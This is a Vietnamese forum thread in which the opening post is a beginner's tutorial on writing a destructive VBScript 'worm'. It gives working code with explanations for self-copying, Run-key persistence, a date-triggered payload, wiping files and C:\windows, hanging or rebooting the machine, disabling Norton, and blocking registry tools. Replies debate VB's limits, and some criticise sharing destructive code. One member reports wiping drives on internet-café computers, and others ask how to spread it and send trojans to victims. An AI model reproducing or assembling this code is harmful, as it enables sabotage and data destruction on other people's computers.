banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... Cấu Trúc Một Con Worm Đơn Giản  XML
  [Question]   Cấu Trúc Một Con Worm Đơn Giản 31/08/2006 09:01:22 (+0700) | #1 | 19397
[Avatar]
Can_Tho_City
Member

[Minus]    0    [Plus]
Joined: 28/08/2006 12:17:55
Messages: 15
Location: Thành Phố Cần Thơ
Offline
[Profile] [PM] [Email]
smiliesmilie) Chào các bạn Newbie, Can_Tho_City giới thiệu với các bạn một con virus(Worm) đơn giản (chỉ để nghiên cứu thôi nhé ).
( Bài này chỉ dành cho Newbie thôi, các đàn anh không nên đọc làm gì.)

Công cụ: Notepad và một chút kiến thức lập trình(ở mức độ căn bản là đủ rồi).

-Code xong nhớ save lại với dạng file .vbs

Chú ý: Nội dung sau dấu trên cùng 1 hàng thì được coi là comment, không có tác dụng gì cả.

Ví dụ: ‘Virus.vbs worm created by Can_Tho_City

Cần kiểm tra xem trong máy bạn có chạy được vbs không, bằng cách soạn thảo 1 file .vbs với nội dung là:
msgbox “hello!” nếu file này không chạy được thì có thể file wscript.exe trong thư mục c:\windows\system32 của bạn bị delete hay hư rồi.

Code:

‘kiem tra
msgbox “hello!”


1. Làm cho virus tự nhân bản và chuyển tới một nơi khác trên máy tính:

Code:

On Error Resume Next '1
Set c_t_c= Createobject("scripting.filesystemobject") '2
c_t_c.copyfile wscript.scriptfullname, c_t_c.GetSpecialFolder(1)& "\ c_t_c.vbs"
'3

Giải thích:

Dòng 1: bỏ qua câu lệnh sai (mở đầu Code nên bắt đầu bằng dòng này).
Dong2: lệnh copy
c_t_c.copyfile wscript.scriptfullname -> lấy tên file của worm
c_t_c.GetSpecialFolder(1)& "\ c_t_c.vbs -> copy vào thư mục (1) với tên file quy định là c_t_c.vbs.
Thư mục (1) ở đây là c:\windows\system\ c_t_c.vbs [ %SystemDir%]
Nếu thay = (0) thì nó sẽ copy bản thân vào c:\windows\ c_t_c.vbs [%windir%]
Thay = (2) thì nó sẽ copy bản thân vào thư mục temp của win [%TempDir%]

Chú ý: Ngoài 3 thư mục đó, nếu muốn làm thư mục khác bạn không thể type thẳng vào c:\virus\ c_t_c.vbs hay c:/virus/ c_t_c.vbs [cái này sẽ nói sau]
2. Ghi 1 khoá vào registry để tự execute mỗi khi khởi động máy

Code:

Set c_t_c 2 = CreateObject("WScript.Shell") ‘4
c_t_c2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\name","wscript.exe "& c_t_c.GetSpecialFolder(0)& "\ c_t_c.vbs %" ‘5


Chú ý: ở dòng 5 name sau Run\ là tên của khoá trong registry, có thể thay đổi.

3. Kỹ thuật “hẹn ngày”

Virus vẫn âm thầm chạy trên máy tính nhưng chỉ tới ngày tháng bạn quy định nó mới tiến hành phá hoại. Ngày giờ được tính theo ngày giờ trên máy bị nhiễm.

Code:

if month(now) =9 and day(now) =11 then
‘your function
msgbox "Stop here!"
end if


Ở đoạn code trên thì đến ngày 11 tháng 9 thì nó sẽ xuất hiện thông báo: “Stop here!”

4. Phá hoại :

Delete file hay thư mục trên máy

Code:

Const vic = "c:\emiu\" ‘6
Delvic ‘7
Sub Delvic() ‘8
Dim fso ‘9
Set fso = CreateObject("Scripting.FileSystemObject") ‘10
fso.DeleteFile vic & "*.*" , True ‘11
fso.DeleteFolder vic & "*" , True ‘12
End Sub

Giải thích:

- Dòng 6 là để khai báo đường dẫn
- Dòng 11 là để delete file, ở đây là *.*
- Dòng 12 là để delete thư mục, ở đây là *
- Có thể thay đổi theo mục đích. Nếu thay bằng smilie c:\windows\ thì sao nhỉ? ( !!!… cry.gif!)

Làm treo máy, hay restart lại máy

Code1:

‘Run notepad một cách auto tới khi treo máy, run notepad ở chế độ ẩn chứ không phải kiểu ‘bomb pop-up’. Cách này effect với mọi OS cho nên 1 cách này là đủ dùng rồi !

On Error Resume Next
Set treomay= CreateObject("WScript.Shell")
Do
treomay.run "notepad",false
loop


Code2:

‘Restart
Dim wsh
Set wsh = createobject("wscript.shell")
wsh.run "RUNDLL32.EXE user.exe,exitwindows"
‘os 95 98 9x


Vô hiệu hoá anti-virus:

Dim wsh
Set wsh= CreateObject( "WScript.Shell")
s1 = "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Norton Program
Scheduler\Start"
wsh.RegWrite s1,3, "REG_DWORD"


(Tùy version mà code lại để đạt hiệu quả nhé.)

Hiển thị message khi reboot máy

dim wsh
Set wsh = CreateObject( "WScript.Shell" )
s1 = "HKLM\Software\Microsoft\Windows\CurrentVersion\WinLogon\"
s2 = "LegalNoticeCaption"
s3 = "LegalNoticeText"
wsh.RegWrite s1+s2, "Hi, I’m Can_Tho_City!"
wsh.RegWrite s1+s3, "Now your computer have a worm!"


Disable Registry
Dim objShell
Set objShell = CreateObject( "WScript.Shell" )
s1= "HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\"
s2 = "Policies\System\DisableRegistryTools"
objShell.RegWrite s1+s2,1, "REG_DWORD"


Lệnh execute 1 file chỉ định

Set exe= CreateObject(“Wscipt.Shell”)
exe.run(“c:\windows\virus.exe”)


Ví dụ minh họa mẫu:

1. Mỗi lần máy tính vừa mở lên thì bị phá ngay lập tức

On Error Resume Next
Set c_t_c= Createobject("scripting.filesystemobject")
c_t_c.copyfile wscript.scriptfullname, c_t_c.GetSpecialFolder(1)& "\ c_t_c.vbs"
Set c_t_c 2= CreateObject("WScript.Shell")
c_t_c 2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\code1","wscript.exe "& c_t_c.GetSpecialFolder(0)& "\ c_t_c.vbs %"
Set treomay= CreateObject("WScript.Shell")
Do
treomay.run "notepad",false
loop


2. Delete c:\windows

On Error Resume Next
Set c_t_c = Createobject("scripting.filesystemobject")
c_t_c.copyfile wscript.scriptfullname,c_t_c.GetSpecialFolder(1)& "\ c_t_c.vbs"
Set c_t_c 2= CreateObject("WScript.Shell")
c_t_c 2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\code2","wscript.exe "& c_t_c.GetSpecialFolder(0)& "\ c_t_c.vbs %"
Set treomay= CreateObject("WScript.Shell")
if month(now) =7 and day(now) =1 then
Const vic = "c:\windows\"
Delvic
Sub Delvic()
Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile vic & "*.*" , True
fso.DeleteFolder vic & "*" , True
End Sub
end if


*Chú ý: vbs có thể insert vào html được

Đây là một con worm cực kỳ đơn giản(=>chuối)... Newbie không nên dùng nó ngoài mục đích học tập!
Bài viết nhằm mục đích học hỏi và trao đổi kinh nghiệm về Virus, các Newbie tự chịu trách nhiệm cho các hành động phá phách lung tung của mình!

Nếu có sai sót rất mong các bạn cho ý kiến đóng góp, tôi xin sẵn sàng đón nhận!
Can_Tho_City.

( smilie Đại ca nào làm bộ Emoticons này tuyệt quá!... thôi để bài sau vậy smilie )
[Up] [Print Copy]
  [Question]   Re: Cấu Trúc Một Con Worm Đơn Giản 31/08/2006 10:29:02 (+0700) | #2 | 19417
[Avatar]
blacknight
Member

[Minus]    0    [Plus]
Joined: 29/07/2006 17:57:08
Messages: 16
Offline
[Profile] [PM] [Yahoo!]
chào bác "Can_Tho_City" em không phải là dân hack chuyên nghiệp, mục đích vào diễn đàn là để học tập về bảo mạt và cách phòng trống, thấy bác giới thiệu về cấu trúc con Worm này em thấy rất hay, nhưng trình độ lập trình của em có hạn, bác co thể viết hoàn chinh hơn về còn worm này cho em được không?. Nếu được bác gửi hoàn chỉnh đoạn code qua mail cho em được không : teckcomnet@yahoo.com

cảm on bác trước nhé.
[Up] [Print Copy]
  [Question]   Cấu Trúc Một Con Worm Đơn Giản 31/08/2006 11:15:21 (+0700) | #3 | 19430
[Avatar]
tui_có_bít_gì_đâu
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 20:51:37
Messages: 19
Location: Hà Nội
Offline
[Profile] [PM] [WWW]
Pác "Can_Tho_City" cho em hỏi vbs có phải ngôn ngữ VBScripst kô?
hoặc nó là do ngôn ngữ gì đi nữa pác có thể cho em cái link ebook tiếng việt của ngôn ngữ này đc chứ ! (nếu kô có đành phải đọc sách vậy)
Nếu có gửi bản hoàn chỉnh cho teckcomnet@yahoo.com thì gửi em 1 bản luôn nhé email : chonglaituonglai87vn@yahoo.com
[Up] [Print Copy]
  [Question]   Re: Cấu Trúc Một Con Worm Đơn Giản 31/08/2006 23:10:11 (+0700) | #4 | 19515
[Avatar]
ducnamnv
Member

[Minus]    0    [Plus]
Joined: 22/09/2003 15:29:11
Messages: 55
Location: Đâu đó
Offline
[Profile] [PM]
Rất cảm ơn Can_tho_city đã đưa đoạn code này lên, giúp tôi học hỏi được nhiều.Tuy nhiên theo tôi việc đưa code VR lên diễn đàn này là rất hấp dẫn, nhưng với mục đích dùng để học hỏi thì không nên đưa ra những đoạn code phá hoại nghiêm trọng như xoá file ... như vậy thì đã vô tình tiếp tay cho người khác phá hoại, đi ngược lại tôn chỉ của diễn đàn này. Tôi nghĩ chỉ nên đưa lên các đoạn code, phương pháp làm sao cho VR của mình tồn tại được lâu, khó bị phát hiện... thì hơn, như bác luke đưa code VR lên mà xoá đoạn mã nguy hiểm ấy.
Rất mong được sự góp ý thêm.
[Up] [Print Copy]
  [Question]   Re: Cấu Trúc Một Con Worm Đơn Giản 01/09/2006 05:43:31 (+0700) | #5 | 19627
[Avatar]
Can_Tho_City
Member

[Minus]    0    [Plus]
Joined: 28/08/2006 12:17:55
Messages: 15
Location: Thành Phố Cần Thơ
Offline
[Profile] [PM] [Email]

blacknight wrote:
chào bác "Can_Tho_City" em không phải là dân hack chuyên nghiệp, mục đích vào diễn đàn là để học tập về bảo mạt và cách phòng trống, thấy bác giới thiệu về cấu trúc con Worm này em thấy rất hay, nhưng trình độ lập trình của em có hạn, bác co thể viết hoàn chinh hơn về còn worm này cho em được không?. Nếu được bác gửi hoàn chỉnh đoạn code qua mail cho em được không : teckcomnet@yahoo.com

cảm on bác trước nhé. 


Chào ban.
Mình nghĩ bạn nên:
1. Đọc lại nội quy khi bạn đăng ký trở thành member!
2. Đọc lại nội quy của box Thảo luận virus, trojan, spyware, worm...
3. Đọc lại chính câu hỏi của mình.


[Up] [Print Copy]
  [Question]   Cấu Trúc Một Con Worm Đơn Giản 01/09/2006 05:49:01 (+0700) | #6 | 19631
[Avatar]
Can_Tho_City
Member

[Minus]    0    [Plus]
Joined: 28/08/2006 12:17:55
Messages: 15
Location: Thành Phố Cần Thơ
Offline
[Profile] [PM] [Email]

tui_có_bít_gì_đâu wrote:
Pác "Can_Tho_City" cho em hỏi vbs có phải ngôn ngữ VBScripst kô?
hoặc nó là do ngôn ngữ gì đi nữa pác có thể cho em cái link ebook tiếng việt của ngôn ngữ này đc chứ ! (nếu kô có đành phải đọc sách vậy)
Nếu có gửi bản hoàn chỉnh cho teckcomnet@yahoo.com thì gửi em 1 bản luôn nhé email : chonglaituonglai87vn@yahoo.com
 


Đọc lại nội quy của Box: Thảo luận virus, trojan, spyware, worm...


[Up] [Print Copy]
  [Question]   Re: Cấu Trúc Một Con Worm Đơn Giản 01/09/2006 05:56:19 (+0700) | #7 | 19635
[Avatar]
Can_Tho_City
Member

[Minus]    0    [Plus]
Joined: 28/08/2006 12:17:55
Messages: 15
Location: Thành Phố Cần Thơ
Offline
[Profile] [PM] [Email]

ducnamnv wrote:
Rất cảm ơn Can_tho_city đã đưa đoạn code này lên, giúp tôi học hỏi được nhiều.Tuy nhiên theo tôi việc đưa code VR lên diễn đàn này là rất hấp dẫn, nhưng với mục đích dùng để học hỏi thì không nên đưa ra những đoạn code phá hoại nghiêm trọng như xoá file ... như vậy thì đã vô tình tiếp tay cho người khác phá hoại, đi ngược lại tôn chỉ của diễn đàn này. Tôi nghĩ chỉ nên đưa lên các đoạn code, phương pháp làm sao cho VR của mình tồn tại được lâu, khó bị phát hiện... thì hơn, như bác luke đưa code VR lên mà xoá đoạn mã nguy hiểm ấy.
Rất mong được sự góp ý thêm. 



Bạn đã đọc kỹ bài của tôi chưa mà kết luận như vậy ?




[Up] [Print Copy]
  [Question]   Cấu Trúc Một Con Worm Đơn Giản 02/09/2006 03:08:40 (+0700) | #8 | 19970
vuadapass
Member

[Minus]    0    [Plus]
Joined: 24/08/2006 21:52:13
Messages: 23
Offline
[Profile] [PM] [Yahoo!]
Xem ra mấy pác đây dân trí lập trình còn thấp quá , công nhận pác viết bài này cũng có hiêu đôi chút đơn giản về lập trình Virus băng VB . Em vẫn khuyên mấy pác ở đây , nếu muốn lập trình Virus thì cũng nên sắm cho mình một cái CD VB6 đi ! , thời đại gì mà chẳng bít gì về ngôn ngữ lập trình cũng ăn được Virus .
Em xin góp ý thêm :
Nếu theo cách của anh trên thì con virus này còn nhiều lối lắm ;
- Cái này không được gọi là Worm
định nghĩa về worm : Đây là chương trình độc lập có thể tự nhân bản bản thân nó và lây lan khắp bên trong mạng .Cũng giống như Virut , nó cũng có thể phá hoạI dữ liệu , hoặc nó có thể phá hoạI bên trong mạng , nhiều khi còn làm down cả mang đó <trích trong diễn đàn> Đây chỉ là một con virus dạng nhỏ để bắt chẹt mấy con gà .
Cái mà nhiều diễn đàn Vb cũng đang tìm hiểu là cách lây lan cho Virus , nếu như Virus chỉ hại một máy thì vẫn chưa là Pro . Một con Virus lây lan tức là như kiểu đính virus vào EXE . Ở trong diễn đàn này cũng có nhưng nó ko hỗ trợ về việc lập trình VB cho chuyện này nên vẫn còn là đau đầu .
Thứ 2 : Nếu chỉ Import mấy khoá đơn giản vào Registry để nó khởi động thì khổng cần Diệt làm chi ... Bật vào Safe Mode xoá mấy khoá trong Registry đi rồi khởi động lại . => triệt tiêu luôn tính năng tự khởi động của Virus .
Cái quan trọng nhì : Chẳng hề nói gì đến việc kill Progress trong Task Manager . Có thể bổ sung thêm băng cách hookdll . Nói chung nên xem lại đi
[Up] [Print Copy]
  [Question]   Cấu Trúc Một Con Worm Đơn Giản 02/09/2006 04:22:58 (+0700) | #9 | 19991
[Avatar]
jamesmr
Member

[Minus]    0    [Plus]
Joined: 03/03/2006 06:30:26
Messages: 153
Offline
[Profile] [PM]

vuadapass wrote:
Xem ra mấy pác đây dân trí lập trình còn thấp quá ...
 

anh bạn này chắc lập trình pro lắm nên mới "khinh" người thếnhỉ smilie
Cái mà nhiều diễn đàn Vb cũng đang tìm hiểu là cách lây lan cho Virus ... 

còn cái mà bồ nói nhiều diễn đàn đàn đang tìm hiều thì tôi thấy ngta làm được lâu rồi. smilie
[Up] [Print Copy]
  [Question]   Cấu Trúc Một Con Worm Đơn Giản 02/09/2006 11:44:52 (+0700) | #10 | 20099
LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
VB quá yếu để thích hợp cho việc viết virus nói riêng và system development nói chung smilie.

Thứ 1:

Cái quan trọng nhì : Chẳng hề nói gì đến việc kill Progress trong Task Manager . Có thể bổ sung thêm băng cách hookdll . Nói chung nên xem lại đi
 

VB không viết được DLL đúng nghĩa.

Thứ 2:

Thứ 2 : Nếu chỉ Import mấy khoá đơn giản vào Registry để nó khởi động thì khổng cần Diệt làm chi ... Bật vào Safe Mode xoá mấy khoá trong Registry đi rồi khởi động lại . => triệt tiêu luôn tính năng tự khởi động của Virus .
 

VB không viết được driver.


Virus băng VB . Em vẫn khuyên mấy pác ở đây , nếu muốn lập trình Virus thì cũng nên sắm cho mình một cái CD VB6 đi ! , thời đại gì mà chẳng bít gì về ngôn ngữ lập trình cũng ăn được Virus .
 

vậy bạn vui lòng post lên 1 sample ?
[Up] [Print Copy]
  [Question]   Cấu Trúc Một Con Worm Đơn Giản 03/09/2006 11:13:42 (+0700) | #11 | 20278
www.gmetal.net
Member

[Minus]    0    [Plus]
Joined: 03/09/2006 00:11:30
Messages: 2
Offline
[Profile] [PM]

LeVuHoang wrote:
VB quá yếu để thích hợp cho việc viết virus nói riêng và system development nói chung smilie.

Thứ 1:

Cái quan trọng nhì : Chẳng hề nói gì đến việc kill Progress trong Task Manager . Có thể bổ sung thêm băng cách hookdll . Nói chung nên xem lại đi
 

VB không viết được DLL đúng nghĩa.

Thứ 2:

Thứ 2 : Nếu chỉ Import mấy khoá đơn giản vào Registry để nó khởi động thì khổng cần Diệt làm chi ... Bật vào Safe Mode xoá mấy khoá trong Registry đi rồi khởi động lại . => triệt tiêu luôn tính năng tự khởi động của Virus .
 

VB không viết được driver.
 

Are You Sure ?
[Up] [Print Copy]
  [Question]   Cấu Trúc Một Con Worm Đơn Giản 03/09/2006 12:01:20 (+0700) | #12 | 20293
baibay
Member

[Minus]    0    [Plus]
Joined: 28/07/2006 21:59:15
Messages: 35
Offline
[Profile] [PM]

LeVuHoang wrote:
VB quá yếu để thích hợp cho việc viết virus nói riêng và system development nói chung smilie.

Thứ 1:

Cái quan trọng nhì : Chẳng hề nói gì đến việc kill Progress trong Task Manager . Có thể bổ sung thêm băng cách hookdll . Nói chung nên xem lại đi
 

VB không viết được DLL đúng nghĩa.

Thứ 2:

Thứ 2 : Nếu chỉ Import mấy khoá đơn giản vào Registry để nó khởi động thì khổng cần Diệt làm chi ... Bật vào Safe Mode xoá mấy khoá trong Registry đi rồi khởi động lại . => triệt tiêu luôn tính năng tự khởi động của Virus .
 

VB không viết được driver.


Virus băng VB . Em vẫn khuyên mấy pác ở đây , nếu muốn lập trình Virus thì cũng nên sắm cho mình một cái CD VB6 đi ! , thời đại gì mà chẳng bít gì về ngôn ngữ lập trình cũng ăn được Virus .
 

VB không viết đc...tai sao.Bác nói rõ hơn chút không ạ.!
nếu không kẻo Company của đệ phá sản chắc chết. smilie-))
thân.
[Up] [Print Copy]
  [Question]   Cấu Trúc Một Con Worm Đơn Giản 03/09/2006 12:20:36 (+0700) | #13 | 20297
LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
hì hì...
Bạn nào thử viết 1 cái DLL (Dynamic Link Library) hoặc 1 cái driver bằng VB 6 rồi post lên đây xem smilie

Còn bạn gì đem cty ra thì... hơi quá smilie
[Up] [Print Copy]
  [Question]   Cấu Trúc Một Con Worm Đơn Giản 04/09/2006 06:23:11 (+0700) | #14 | 20450
[Avatar]
Can_Tho_City
Member

[Minus]    0    [Plus]
Joined: 28/08/2006 12:17:55
Messages: 15
Location: Thành Phố Cần Thơ
Offline
[Profile] [PM] [Email]

vuadapass wrote:
Xem ra mấy pác đây dân trí lập trình còn thấp quá , công nhận pác viết bài này cũng có hiêu đôi chút đơn giản về lập trình Virus băng VB . 

Rất mong được sự chỉ giáo của bạn.
Tại sao chúng ta không thảo luận trên tinh thần xây dựng & học hỏi nhỉ?

Bài viết dành cho Newbie nghiên cứu nên mới giải thích rõ từng lệnh thế!
Chính vì nhắm vào Newbie nên mới cho một ví dụ đơn giản.smilie smilie smilie
[Up] [Print Copy]
  [Question]   Cấu Trúc Một Con Worm Đơn Giản 04/09/2006 07:46:07 (+0700) | #15 | 20461
[Avatar]
tui_có_bít_gì_đâu
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 20:51:37
Messages: 19
Location: Hà Nội
Offline
[Profile] [PM] [WWW]

Can_Tho_City wrote:

vuadapass wrote:
Xem ra mấy pác đây dân trí lập trình còn thấp quá , công nhận pác viết bài này cũng có hiêu đôi chút đơn giản về lập trình Virus băng VB . 

Rất mong được sự chỉ giáo của bạn.
Tại sao chúng ta không thảo luận trên tinh thần xây dựng & học hỏi nhỉ?

Bài viết dành cho Newbie nghiên cứu nên mới giải thích rõ từng lệnh thế!
Chính vì nhắm vào Newbie nên mới cho một ví dụ đơn giản.smilie smilie smilie  

em rất đồng ý với bác
em đã thực hành khá tốt và viết thử 1 con thấy nó xoá sạch ổ D & C, nếu kô xoá đc ổ C thì C:\windows hoặc C:\windows\system 32. Cuối cùng là treo máy
Nhưng kô biết lúc khởi động lại nó có tự chạy đc kô nữa ( vì em thử ở ngoài quán net mà)
Bác có thể hướng dẫn cách làm cho nó lây lan trên mạng kô ?
[Up] [Print Copy]
  [Question]   Cấu Trúc Một Con Worm Đơn Giản 06/09/2006 12:36:34 (+0700) | #16 | 21067
baibay
Member

[Minus]    0    [Plus]
Joined: 28/07/2006 21:59:15
Messages: 35
Offline
[Profile] [PM]

LeVuHoang wrote:
hì hì...
Bạn nào thử viết 1 cái DLL (Dynamic Link Library) hoặc 1 cái driver bằng VB 6 rồi post lên đây xem smilie

Còn bạn gì đem cty ra thì... hơi quá smilie 

Đùa tí thôi đừng tưởng thiệt.
sorry pác nhá, vì đọc ko kĩ cái chữ VB6...hehe đừng giận.. :lolsmilie
[Up] [Print Copy]
  [Question]   Re: Cấu Trúc Một Con Worm Đơn Giản 10/09/2006 02:38:34 (+0700) | #17 | 22090
[Avatar]
duytrongcpu
Member

[Minus]    0    [Plus]
Joined: 06/09/2006 00:46:35
Messages: 1
Location: Hà Tây Quê Lụa
Offline
[Profile] [PM] [WWW] [Yahoo!]
Xin lỗi. Các bác cho em hỏi xem nếu có code trojan rồi thì copy nó vào đâu + phải làm ntn để có đuôi .exe để gửi cho victim.
Xin Chân thành cảm ơn!!! smilie)

(Em reply để xin chỉ giáo thôi, nếu ko trả lời thì thôi đừng ban em :cry: :cry: )
[Up] [Print Copy]
  [Question]   Cấu Trúc Một Con Worm Đơn Giản 10/09/2006 03:08:10 (+0700) | #18 | 22095
[Avatar]
H0angY3nXinhdep
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 12:58:49
Messages: 9
Offline
[Profile] [PM] [WWW] [Yahoo!]
Những cơ bản này có ích cho những ai bước đầu tìm hiểu lập trình hay kiểm soát hệ thống, cái này chắc có trong giáo trình của các trường CNTT nhỉ? Còn sợ nó nguy hiểm thì cũng không hẳn vì tool tự viết virus khá nhiều , và cũng nguy hiểm không kém (trên máy đơn). IT rất là rộng, không ai hiểu được hết mọi thứ, không phải ai cũng hiểu về lập trình, cũng như 90% mọi người ở đây không biết hết cách trang trí văn bản excel chuyên nghiệp vậy
[Up] [Print Copy]
  [Question]   Re: Cấu Trúc Một Con Worm Đơn Giản 10/09/2006 21:26:30 (+0700) | #19 | 22215
khazar
Member

[Minus]    0    [Plus]
Joined: 08/09/2006 09:50:14
Messages: 14
Offline
[Profile] [PM]
pac' can_tho_city viết thêm nhìu bài như vầy nữa đi!
hay quá hà! smilie
ví dụ như là về trojan hoặc là gì gì đó nữa smilie)
[Up] [Print Copy]
  [Question]   Re: Cấu Trúc Một Con Worm Đơn Giản 16/03/2007 01:27:00 (+0700) | #20 | 46902
lekhadinh123
Member

[Minus]    0    [Plus]
Joined: 10/03/2007 02:00:40
Messages: 7
Offline
[Profile] [PM]
mèng ơi cũng tạm tạm thôi nhưng con này có vẻ có sức khỏe hơi yếu thì phải đúng không Can_tho
bạn có thể bồi bổ nó bằng heroin cho nó khỏe lên chút đó chông nó yếu nắm hiiiiiii
smilie
[Up] [Print Copy]
  [Question]   Cấu Trúc Một Con Worm Đơn Giản 16/03/2007 07:35:28 (+0700) | #21 | 47007
[Avatar]
xnohat
Moderator

Joined: 30/01/2005 13:59:19
Messages: 1210
Location: /dev/null
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!] [MSN]
Trên lý thuyết, mọi loại ngôn ngữ lập trình đề có thể viết virus và phục vụ việt phát tán virus ( không loại trừ cả XML và HTML ).

Cái chính mà những kẻ "rảnh hơi" viết virus có là một cái đầu thông minh, với nó ta có thể làm tất cả, viết những con virus "cao siêu", không có nó ta chỉ có bó tứ chi.

Bàn nhiều về cách viết virus, tại sao không bàn về các thuật toán , cơ chế hoạt động cũng như cách mà virus lây lan, có giá trị hơn là bàn về cách viết ra một con virus, rồi thêm mắm thêm muối cho nó phá mạnh , quậy tốt, để rồi lại sinh ra một loạt những con virus do những người thiếu suy nghĩ làm ra, để rồi làm loạn như vụ một loạt virus nhái "gaixinh" vừa qua.

Thật thiếu suy nghĩ khi nghĩ rằng ta tạo được một con virus là ta đã giỏi hơn thiên hạ, thiên hạ còn nhiều kẻ giỏi mà cả đời chưa viết con virus nào.
iJust clear, "What I need to do and how to do it"/i
br
brBox tán gẫu dời về: http://www.facebook.com/hvaonline
[Up] [Print Copy]
  [Question]   Cấu Trúc Một Con Worm Đơn Giản 16/03/2007 07:47:01 (+0700) | #22 | 47014
[Avatar]
tmd
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Dân Việt có người này nọ kia, chịu thôi. Nhưng vì mấy vị đó không phải là Einstein nên con virus/worm/trojan đó không phải là hiểm hoạ hủy diệt trái đất. Vô tư đi bà con ơi.
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Up] [Print Copy]
  [Question]   Cấu Trúc Một Con Worm Đơn Giản 16/03/2007 08:22:15 (+0700) | #23 | 47020
Defender
Locked

Joined: 03/07/2006 11:27:43
Messages: 624
Offline
[Profile] [PM] [WWW] [Yahoo!]

hackernohat wrote:
Trên lý thuyết, mọi loại ngôn ngữ lập trình đề có thể viết virus và phục vụ việt phát tán virus ( không loại trừ cả XML và HTML ).

Cái chính mà những kẻ "rảnh hơi" viết virus có là một cái đầu thông minh, với nó ta có thể làm tất cả, viết những con virus "cao siêu", không có nó ta chỉ có bó tứ chi.

Bàn nhiều về cách viết virus, tại sao không bàn về các thuật toán , cơ chế hoạt động cũng như cách mà virus lây lan, có giá trị hơn là bàn về cách viết ra một con virus, rồi thêm mắm thêm muối cho nó phá mạnh , quậy tốt, để rồi lại sinh ra một loạt những con virus do những người thiếu suy nghĩ làm ra, để rồi làm loạn như vụ một loạt virus nhái "gaixinh" vừa qua.

Thật thiếu suy nghĩ khi nghĩ rằng ta tạo được một con virus là ta đã giỏi hơn thiên hạ, thiên hạ còn nhiều kẻ giỏi mà cả đời chưa viết con virus nào. 


Nohat bây giờ khác hẳn ngày xưa nhỉ smilie
Chúc mừng smilie)
[Up] [Print Copy]
  [Question]   Cấu Trúc Một Con Worm Đơn Giản 17/03/2007 05:53:28 (+0700) | #24 | 47259
[Avatar]
ngochoan2003
Member

[Minus]    0    [Plus]
Joined: 15/05/2003 14:09:36
Messages: 91
Offline
[Profile] [PM] [WWW]
Các bác bảo là VB6 không thể viết được Virus hả ?
Có dám chắc không ? Tui khẳng định VB có thể làm tất cả thậm chí viết luôn được cả Worm luôn. Có tin không ?
[Up] [Print Copy]
  [Question]   Cấu Trúc Một Con Worm Đơn Giản 17/03/2007 06:38:16 (+0700) | #25 | 47269
[Avatar]
delua
Locked

[Minus]    0    [Plus]
Joined: 28/12/2006 00:48:39
Messages: 102
Offline
[Profile] [PM]

ngochoan2003 wrote:
Các bác bảo là VB6 không thể viết được Virus hả ?
Có dám chắc không ? Tui khẳng định VB có thể làm tất cả thậm chí viết luôn được cả Worm luôn. Có tin không ? 


Việc đầu tiên cần làm là đọc thật kỹ bài viết của anh Hoàngsuy ngẫm bài viết của bác hackernohat.

Chưa ai nói VB không viết được virus và cũng chưa ai khẳng định VB có thể làm được tất cả.
[Up] [Print Copy]
  [Question]   Cấu Trúc Một Con Worm Đơn Giản 17/03/2007 21:00:29 (+0700) | #26 | 47429
[Avatar]
ngochoan2003
Member

[Minus]    0    [Plus]
Joined: 15/05/2003 14:09:36
Messages: 91
Offline
[Profile] [PM] [WWW]

delua wrote:

ngochoan2003 wrote:
Các bác bảo là VB6 không thể viết được Virus hả ?
Có dám chắc không ? Tui khẳng định VB có thể làm tất cả thậm chí viết luôn được cả Worm luôn. Có tin không ? 


Việc đầu tiên cần làm là đọc thật kỹ bài viết của anh Hoàngsuy ngẫm bài viết của bác hackernohat.

Chưa ai nói VB không viết được virus và cũng chưa ai khẳng định VB có thể làm được tất cả.
 

:lolsmilie thế hả !
Thế bạn đã đọc kỹ chưa ?
Ý kiến của hackernohat thì OK rất đúng, Hoàng cũng vậy nhưng tôi chỉ muốn nói ở đây là ngôn ngữ lập trình nào cũng có thể viết được Virus. Chỉ có điều là khó hay dễ thôi.
[Up] [Print Copy]
  [Question]   Cấu Trúc Một Con Worm Đơn Giản 17/03/2007 23:24:47 (+0700) | #27 | 47449
[Avatar]
Look2Me
Member

[Minus]    0    [Plus]
Joined: 26/07/2006 23:30:57
Messages: 235
Location: Tủ quần nào
Offline
[Profile] [PM]

hackernohat wrote:
Trên lý thuyết, mọi loại ngôn ngữ lập trình đề có thể viết virus và phục vụ việt phát tán virus ( không loại trừ cả XML và HTML ).

Cái chính mà những kẻ "rảnh hơi" viết virus có là một cái đầu thông minh, với nó ta có thể làm tất cả, viết những con virus "cao siêu", không có nó ta chỉ có bó tứ chi.

Bàn nhiều về cách viết virus, tại sao không bàn về các thuật toán , cơ chế hoạt động cũng như cách mà virus lây lan, có giá trị hơn là bàn về cách viết ra một con virus, rồi thêm mắm thêm muối cho nó phá mạnh , quậy tốt, để rồi lại sinh ra một loạt những con virus do những người thiếu suy nghĩ làm ra, để rồi làm loạn như vụ một loạt virus nhái "gaixinh" vừa qua.

Thật thiếu suy nghĩ khi nghĩ rằng ta tạo được một con virus là ta đã giỏi hơn thiên hạ, thiên hạ còn nhiều kẻ giỏi mà cả đời chưa viết con virus nào. 

Ủng hộ NoHat! Tớ cũng chỉ thích bàn luận đến các vấn đề kỹ thuật thôi. Gét cái bọn chưa chắc biết cái gì copy vài cái code vớ vẩn ra show hàng.
[Up] [Print Copy]
